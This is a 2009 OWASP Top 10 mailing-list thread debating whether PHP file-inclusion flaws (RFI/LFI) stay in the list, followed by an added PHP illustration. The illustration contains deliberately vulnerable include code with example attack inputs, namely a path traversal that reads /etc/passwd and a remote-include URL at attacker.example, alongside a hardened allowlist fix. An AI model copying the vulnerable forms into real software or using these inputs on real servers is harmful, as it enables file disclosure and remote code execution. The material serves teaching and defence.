[Owasp-topten] RFI taken out

tyronmiller at gmail.com tyronmiller at gmail.com
Thu Nov 19 16:48:28 EST 2009


Hey Dave,

Like I said, I don't think it's a good idea to group vulnerabilities to such
a high level because the Top 10 needs to be basic enough for non-pen
testers to easily understand what needs to be fixed, which has been
mentioned by a couple of people now.

Although I personally think it's a mistake (since it's a major way of
compromising a web server), I would prefer to see RFI/LFI in an appendix
of "The Reject Vulnerabilities" in its own section than grouped into a
category where it just disappears.

Ty


On , Dave Wichers <dave.wichers at aspectsecurity.com> wrote:
> I'm OK with sneaking PHP RFI back into the Top 10 as a configuration
> item that is now covered under A6 - Security Misconfiguration.
>
> I don't know if that is a stretch but it at least is a place to hang
> your hat. :-)
>
> -Dave
>
> -----Original Message-----
> From: Steven M. Christey [mailto:coley at linus.mitre.org]
> Sent: Tuesday, November 17, 2009 7:22 PM
> To: Ty Miller; Dave Wichers
> Cc: owasp-topten at lists.owasp.org
> Subject: Re: [Owasp-topten] RFI taken out
>
> On Tue, 17 Nov 2009, Dave Wichers wrote:
>
> > we are trying to get a sense of how big this problem is across all
> > users of the top 10. Based on the data we saw from MITRE, Aspect, White Hat,
> > and Softek, the frequency of this issue had dropped significantly since
> > 2006/2007, and for non-PHP developers this is a relatively rare issue.
>
> Based on my interpretation of the CVE data, RFI has dropped (relatively
> speaking), suggesting that the pool of obviously-vulnerable applications
> is dropping, or there is a higher cost-benefit ratio for launching a
> successful attack. I'm seeing more CVEs that target code snippets like
> this one from CVE-2009-3064:
>
> require("./../".$_GET["filename"]);
>
> This is more LFI than RFI.
>
> Also - in modern PHPs, allow_url_fopen is disabled, which in conjunction
> with restrictive register_globals settings, suggests that much of the
> remaining RFI problem is related to configuration. (Though admittedly,
> some modern PHP oddities are still equivalent to RFI, and admins are often
> stuck using older PHP versions.)
>
> Note that RFI/LFI is occasionally reported in CVE for other languages such
> as ColdFusion, Python, Ruby, and other interpreted languages. But that's
> extremely rare. (Could be that the researchers aren't paying attention in
> this area, though.)
>
> Disclaimer: CVE data is necessarily affected by what vuln researchers
> decide to publish, so it reflects their own biases. And as Dave said, CVE
> isn't the only data source for the Top Ten.
>
> - Steve
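Editor's added illustration of the LFI-versus-RFI distinction Steve draws above. This is not code from the thread, from OWASP, or from the software behind CVE-2009-3064; the page directory, page keys and file names are assumed, and the code needs PHP 7.1 or later for its syntax. The quoted one-liner is kept as the first (deliberately vulnerable) form, a second form shows where RFI actually becomes possible, and the third is a hardened allowlist version. The configuration facts it relies on: include/require of URLs is controlled by allow_url_include (added in PHP 5.2.0, default Off), which is separate from allow_url_fopen, and include paths containing a NUL byte are rejected from PHP 5.3.4 on.

```php
<?php
// Added illustration, not code from the mailing-list thread or from the
// CVE-2009-3064 software. PAGE_DIR, PAGES and the page keys are assumed.
declare(strict_types=1);

// Form 1: the snippet Steve quotes. Because "./../" is prepended, the user
// value can never begin with a stream wrapper (http://, php://filter, ...),
// so this is LFI (path traversal to any readable local file, e.g.
// ?filename=../../../etc/passwd), not RFI, whatever allow_url_include says.
// On PHP < 5.3.4 a %00 in the value would also truncate any appended suffix.
function include_with_prefix(string $filename): void
{
    require("./../" . $filename);
}

// Form 2: the user value is the whole path. With allow_url_include=On,
// ?page=http://attacker.example/x.txt is fetched and executed: true RFI.
// With it Off (the default since PHP 5.2) the same code is still LFI.
function include_unprefixed(string $page): void
{
    require($page);
}

// Hardened form: the request carries only a short key that is mapped to a
// fixed file. Nothing user-controlled is concatenated into the path, and the
// resolved path is still checked to lie inside PAGE_DIR as defence in depth.
const PAGE_DIR = __DIR__ . '/pages';                       // assumed layout
const PAGES = ['home' => 'home.php', 'contact' => 'contact.php'];

function resolve_page(string $key): ?string
{
    if (!array_key_exists($key, PAGES)) {
        return null;                        // unknown key: refuse, never guess
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$key]);
    if ($base === false || $path === false) {
        return null;                        // missing directory or file
    }
    // realpath() has collapsed any "..", so a prefix comparison is sufficient.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

function safe_include(string $key): void
{
    $path = resolve_page($key);
    if ($path === null) {
        http_response_code(404);
        return;
    }
    require $path;
}

// The two ini settings the discussion turns on. allow_url_fopen governs
// fopen()/file_get_contents() on URLs; allow_url_include separately governs
// include/require and is what decides whether Form 2 is RFI or only LFI here.
function url_include_status(): array
{
    return [
        'allow_url_fopen'   => filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN),
        'allow_url_include' => filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN),
    ];
}

// Entry point: a non-string (e.g. page[]=x) is treated as an unknown key.
$key = $_GET['page'] ?? 'home';
safe_include(is_string($key) ? $key : '');
```

The point of the allowlist form is that the fix does not depend on php.ini at all: Form 2 is only "safe" on a server where allow_url_include happens to be Off and still leaks local files there, whereas resolve_page() never lets request data reach the include path in the first place.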
